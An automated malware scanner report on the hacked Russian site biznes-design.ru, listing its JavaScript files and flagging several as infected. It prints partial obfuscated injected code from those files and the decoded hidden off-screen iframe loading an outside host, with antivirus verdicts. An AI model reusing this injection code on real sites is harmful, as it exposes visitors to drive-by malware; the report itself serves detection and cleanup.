New scan:

Malware Scanner report for biznes-design.ru

Malicious/Suspicious/Total urls checked
4/5/15
9 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "biznes-design.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=biznes-design.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://biznes-design.ru/
200 OK
Content-Length: 32711
Content-Type: text/html
clean
http://biznes-design.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 112123
Content-Type: application/x-javascript
clean
http://biznes-design.ru/media/system/js/core.js
200 OK
Content-Length: 20545
Content-Type: application/x-javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch
...[3797 bytes skipped]...

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

http://biznes-design.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 15691
Content-Type: application/x-javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch
...[1490 bytes skipped]...

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js
200 OK
Content-Length: 85260
Content-Type: text/javascript
clean
http://biznes-design.ru/media/plg_jblibrary/jquery/jquery.noconflict.js
200 OK
Content-Length: 15706
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 962 bytes are skipped ...
e = getCookie('tu'+'ge'+'ne'+'13'+'ve'+'ca1'+'ka'+'a9');
if (cookie == undefined) {
setCookie('tu'+'ge'+'ne'+'13'+'ve'+'ca1'+'ka'+'a9', true, 86400);
document.write('<i'+'f'+'ra'+'me'+' s'+'rc'+'='+'http://reactor.androidnoticia.com.br/?id=bill'+' s'+'t'+'y'+'l'+'e'+'='+'p'+'o'+'s'+'i'+'t'+'i'+'o'+'n'+':'+'a'+'b'+'s'+'o'+'l'+'u'+'t'+'e'+';'+'l'+'e'+'f'+'t'+':'+'-1800px;top:-1800px;'+' height="199" width="199">'+'</i'+'fr'+'ame>');
}
}
})();
$.noConflict();

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566

http://biznes-design.ru/media/plg_jblibrary/jquery/jquery.lazyload.js
200 OK
Content-Length: 17861
Content-Type: application/x-javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch
...[3723 bytes skipped]...

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

http://biznes-design.ru/media/system/js/modal.js
200 OK
Content-Length: 25493
Content-Type: application/x-javascript
clean
http://biznes-design.ru/media/k2/assets/js/jquery-1.7.1.min.js
200 OK
Content-Length: 109629
Content-Type: application/x-javascript
clean
http://biznes-design.ru/components/com_k2/js/k2.js
200 OK
Content-Length: 22579
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 3402 bytes are skipped ...
llerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length);
});
// Equal block heights for the "default" view
$K2(window).load(function () {
var blocks = $K2('.subCategory, .k2EqualHeights');
var maxHeight = 0;
blocks.each(function(){
maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height')));
});
blocks.css('height', maxHeight);
});
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

Antivirus reports:

DrWeb
SCRIPT.Virus

http://biznes-design.ru/templates/shaper_event/js/tools.js
200 OK
Content-Length: 17186
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 2019 bytes are skipped ...
'left');
})
function sp_margin(container, dir){
if (typeof(dir)==='undefined') dir = 'right';
var rtl = document.getElement('.rtl');
if (rtl) {
if (dir==='right') {
dir = 'left';
} else {
dir = 'right';
}
}
var c_width = (window.getSize().x - document.getElements('.sp-wrap')[0].getWidth())/2;
document.id(container).setStyle('margin-' + dir, - c_width );
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566

http://biznes-design.ru/plugins/system/helix/js/menu.js
200 OK
Content-Length: 20582
Content-Type: application/x-javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch
...[3721 bytes skipped]...

Decoded script:

...[11752 bytes skipped]...
lect_box.injectInside(selector);document.getElements('ul.sp-menu a.menu-item').each(function(el){optText='&nbsp;'+el.get('text');optSub=el.getParents('ul').hasClass('sp-menu');len=optSub.length;dash;if(el.getParents('ul').hasClass('sp-menu')){dash=Array(len).join('&ndash;');optText=dash+optText}opt=new Element('option',{"value":el.href,"html":optText,"selected":el.href==window.location.href});opt.injectInside(select_box)})}});
<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

http://biznes-design.ru/templates/shaper_event/js/totop.js
200 OK
Content-Length: 16737
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 1530 bytes are skipped ...
0, transition: Fx.Transitions.linear}, window);
var a = document.id('topofpage'); if (a) {
a.set('opacity','0').setStyle('display','block');
window.addEvent('scroll',function(e) {
a.fade((window.getScroll().y > 300) ? 'in' : 'out')
});
var b = new Fx.Scroll(window);
a.addEvent('click', function (e) {
new Event(e).stop();
b.toTop()
})
}
});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566

http://biznes-design.ru/modules/mod_sptab/assets/js/sptab.js
200 OK
Content-Length: 19938
Content-Type: application/x-javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch
...[3722 bytes skipped]...

Decoded script:

...[10058 bytes skipped]...
yle("top",-e+"px");b={top:[-e,0]}}else{this.items[a].setStyle("top",e+"px");b={top:[e,0]}}break}new Fx.Elements([this.items[g],this.items[a],this.items_mask],{duration:this.options.fxduration,transition:this.options.transition,onComplete:function(){this.running=false}.bind(this)}).start({"0":{display:'none'},"1":$merge({display:'block'},b),"2":{height:[e,this.options.autoHeight?this.items[a].getHeight():this.options.fixedHeight]}})}};
<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

http://biznes-design.ru/PopIn.js
404 Not Found
Content-Length: 206
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: biznes-design.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 03:43:30 GMT
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: 3f83f744190cbb4b99f87758800a53ef=55fef50ec4820365e91e19974b36f644; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: biznes-design.ru
Referer: http://www.google.com/search?q=biznes-design.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.